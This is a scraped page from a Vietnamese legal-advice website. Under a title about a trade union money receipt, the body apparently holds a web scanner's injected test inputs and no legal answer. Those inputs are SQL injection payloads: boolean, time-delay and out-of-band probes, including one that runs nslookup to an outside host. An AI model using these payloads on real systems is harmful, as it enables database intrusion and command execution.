Bạn cần tư vấn Pháp luật?
Hãy gọi : 1900 6188
"Tổng đài tư vấn pháp luật 1900 6188" là dịch vụ tư vấn luật qua điện thoại của Công ty Luật VinaBiz
  • Tư vấn trực tuyến miễn phí
  • Đội ngũ Luật sư uy tín
  • Tư vấn 24/7
Luật sư tư vấn pháp luật online miễn phí đầu số 1900 6188

Giấy biên nhận tiền của công đoàn

Cập nhật lần cuối lúc 14:00 ngày 27/07/2013

1
1
1'"
1
\
1
1
-1 OR 2+861-861-1=0+0+0+1 --
@@Y1vG9
-1 OR 3+861-861-1=0+0+0+1 --
JyI=
-1 OR 3*2<(0+5+861-861) --
-1 OR 3*2>(0+5+861-861) --
-1 OR 2+133-133-1=0+0+0+1
-1 OR 3+133-133-1=0+0+0+1
-1 OR 3*2<(0+5+133-133)
-1 OR 3*2>(0+5+133-133)
-1' OR 2+369-369-1=0+0+0+1 --
-1' OR 3+369-369-1=0+0+0+1 --
-1' OR 3*2<(0+5+369-369) --
-1' OR 3*2>(0+5+369-369) --
-1' OR 2+761-761-1=0+0+0+1 or 'P7W5lLK0'='
-1' OR 3+761-761-1=0+0+0+1 or 'P7W5lLK0'='
-1' OR 3*2<(0+5+761-761) or 'P7W5lLK0'='
-1' OR 3*2>(0+5+761-761) or 'P7W5lLK0'='
-1" OR 2+909-909-1=0+0+0+1 --
-1" OR 3+909-909-1=0+0+0+1 --
-1" OR 3*2<(0+5+909-909) --
-1" OR 3*2>(0+5+909-909) --
if(now()=sysdate(),sleep(10.781),0)/*'XOR(if(now()=sysdate(),sleep(10.781),0))OR'"XOR(if(now()=sysdate(),sleep(10.781),0))OR"*/
(select(0)from(select(sleep(21.562)))v)/*'+(select(0)from(select(sleep(21.562)))v)+'"+(select(0)from(select(sleep(21.562)))v)+"*/
-1; waitfor delay '0:0:21.562' --
-1); waitfor delay '0:0:21.562' --
1 waitfor delay '0:0:32.343' --
O2CETLSU'; waitfor delay '0:0:32.343' --
-1;select pg_sleep(32.343); --
-1);select pg_sleep(10.781); --
-1);select pg_sleep(0); --
-1));select pg_sleep(21.562); --
RuIIVE13';select pg_sleep(21.562); --
n2E6HHxg');select pg_sleep(32.343); --
eSeeXaFK'));select pg_sleep(10.781); --
U38JHlHy'));select pg_sleep(21.562); --
1||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-5871.34060.dfc45.1.bxss'||'.me')
'||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-5872.34060.dfc45.1.bxss'||'.me')||'
1;copy (select '') to program 'nslookup dns.sqli.\027931.34060-5874.34060.dfc45.\1.bxss.me'
1';copy (select '') to program 'nslookup dns.sqli.\027931.34060-5875.34060.dfc45.\1.bxss.me
759'

Tư vấn pháp luật online miễn phí đầu số 1900 6188

Đặt câu hỏi

Họ tên:
Email:
Tiêu đề: